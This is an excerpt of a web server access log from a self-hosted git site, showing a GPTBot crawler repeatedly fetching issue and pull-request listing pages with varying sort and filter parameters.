[Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:19:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 